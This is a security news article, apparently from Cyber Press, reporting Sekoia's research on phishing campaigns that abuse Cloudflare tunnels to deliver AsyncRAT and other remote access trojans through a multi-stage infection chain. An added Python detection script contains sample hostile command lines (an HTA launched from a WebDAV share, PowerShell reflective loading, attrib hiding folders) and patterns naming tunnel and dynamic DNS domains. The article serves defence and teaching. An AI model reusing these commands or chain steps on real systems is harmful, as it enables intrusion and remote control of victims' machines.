Threat Actors Abuse Cloudflare Tunnels to Distribute Multiple Remote Access Trojans

Threat intelligence researchers at Sekoia’s Threat Detection & Research (TDR) team have uncovered a sophisticated adversary infrastructure that exploits Cloudflare’s tunnel service to deliver a variety of remote access trojans (RATs) to targeted systems.

The technique, operational since at least February 2024 and corroborated by multiple cybersecurity vendors including Forcepoint, Fortinet, Orange, and Proofpoint, demonstrates persistent abuse of the TryCloudflare tunneling solution for evading detection and facilitating malicious payload delivery.

Adversaries Leverage Cloudflare’s TryCloudflare for Stealthy RAT Deployment

The underlying campaigns employ elaborate, multi-step infection chains designed to bypass conventional security defenses and exploit users’ trust in seemingly legitimate communications.

Initial compromise is achieved via spear-phishing emails, frequently masquerading as business-related notifications such as invoices or purchase orders.

These emails often embed a crafted “application/windows-library+xml” file, an outdated but still occasionally trusted file type, which references a malicious remote WebDAV resource.

Upon user interaction, this library file triggers the retrieval of a malicious Windows shortcut (LNK) file, tailored to impersonate a legitimate document (e.g., a PDF).

Modern browsers attempt to mitigate automatic execution by appending a “.download” extension, yet attackers have shifted to leveraging LNK files accessed over the network to circumvent such safeguards.

Clicking the shortcut launches an embedded HTML Application (HTA), which executes further code via VBScript to run an obfuscated batch (BAT) script acquired from the attacker’s infrastructure.

Figure: LNK file properties pointing to the HTA file

Complex, Multi-Stage Infection Chains Target Windows Systems Across Organizations

According to the report, this batch script serves as a critical junction in the attack chain.

It orchestrates the download and installation of Python and supporting scripts (packaged as archives such as XZ) via PowerShell commands, then executes these Python scripts to inject the next-stage payloads into benign processes such as “notepad.exe.”

Persistence is established by dropping obfuscated VBS and BAT files into the Windows Startup directory, a known technique for evading behavioral detection tools.

The final payload is typically a remote access trojan (such as AsyncRAT), loaded reflectively from a JPEG image containing a base64-encoded DLL.

Figure: Infection chains distributing AsyncRAT

This stage leverages PowerShell’s “System.Reflection.Assembly::Load” method, a known indicator of PowerShell-based reflective loading.

The RAT then connects to command-and-control (C2) endpoints residing behind Cloudflare tunnels and dynamic DNS services (e.g., dyndns.org, duckdns.org), further masking the attackers’ operational infrastructure and complicating attribution and network-based detection.

Throughout the infection lifecycle, the adversaries implement several layers of defense evasion, including the manipulation of file attributes (attrib.exe) to hide installation directories from users and security solutions.

They also perform post-exploitation cleanup to mitigate forensic discovery.

Sekoia’s detection strategy relies heavily on correlation rules and Sigma-based detection content, continuously updated to catch suspicious file types, process chains, and network connections unique to these campaigns.
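As an added illustration of the behavior-based detection the report describes (this is not Sekoia’s detection content and not code from the article), the following Python script applies a handful of checks drawn from the chain above to constructed Sysmon-style events: an HTA launched from a WebDAV share, a PowerShell reflective assembly load, attrib.exe hiding a directory, a script dropped in the Startup folder, and DNS lookups for TryCloudflare or dynamic DNS domains. The paths, IP address and hostname in the sample events are made-up values.

```python
import re

# Constructed Sysmon-style sample telemetry for the walkthrough; not real campaign logs.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"mshta.exe \\203.0.113.10@80\DavWWWRoot\jmb.hta"},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "powershell -w hidden -c [System.Reflection.Assembly]::Load($bytes)"},
    {"type": "process", "image": r"C:\Windows\System32\attrib.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"attrib +h +s C:\Users\u\AppData\Local\install"},
    {"type": "file", "path": r"C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pws1.vbs"},
    {"type": "dns", "query": "quiet-sample-words-here.trycloudflare.com"},  # constructed hostname
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "notepad.exe"},  # benign: launched normally, must not alert
]

WEBDAV_RE = re.compile(r"\\\\[^\\\s]+@(?:\d+|ssl)\\|davwwwroot", re.I)  # \\host@80\ or \\host@SSL\ UNC paths
REFLECT_RE = re.compile(r"reflection\.assembly\]?::load", re.I)           # [System.Reflection.Assembly]::Load
STARTUP_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.(?:vbs|bat)$", re.I)
TUNNEL_RE = re.compile(r"\.(?:trycloudflare\.com|duckdns\.org|dyndns\.org)$", re.I)

def detect(event):
    """Return the names of the rules an event matches (empty list if nothing fires)."""
    hits = []
    if event["type"] == "process":
        image, cmd = event["image"].lower(), event["cmdline"]
        if image.endswith("mshta.exe") and WEBDAV_RE.search(cmd):
            hits.append("hta_launched_from_webdav")
        if image.endswith("powershell.exe") and REFLECT_RE.search(cmd):
            hits.append("powershell_reflective_assembly_load")
        if image.endswith("attrib.exe") and re.search(r"\+h", cmd):
            hits.append("attrib_hide_directory")
    elif event["type"] == "file" and STARTUP_RE.search(event["path"]):
        hits.append("script_dropped_in_startup")
    elif event["type"] == "dns" and TUNNEL_RE.search(event["query"]):
        hits.append("dns_to_tunnel_or_ddns")
    return hits

def scan(events):
    """Map each rule name to the indices of the events that fired it."""
    fired = {}
    for i, ev in enumerate(events):
        for name in detect(ev):
            fired.setdefault(name, []).append(i)
    return fired

if __name__ == "__main__":
    for rule, idxs in scan(SAMPLE_EVENTS).items():
        print(f"{rule}: events {idxs}")
```

Each check on its own is noisy in a real estate; the point, as in the report, is correlating several of them on one host within a short window.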

As attackers persist in leveraging trusted services like Cloudflare to facilitate malware deployment, defenders are urged to augment detection capabilities with timely threat intelligence and behavior-based monitoring.

Continuous vigilance and collaboration across the security community remain paramount to stay ahead of evolving threats that blend old and new techniques for stealthy persistence.

Indicators of Compromise (IOCs)


Mandvi
Mandvi is a Security Reporter covering data breaches, malware, cyberattacks, data leaks, and more at Cyber Press.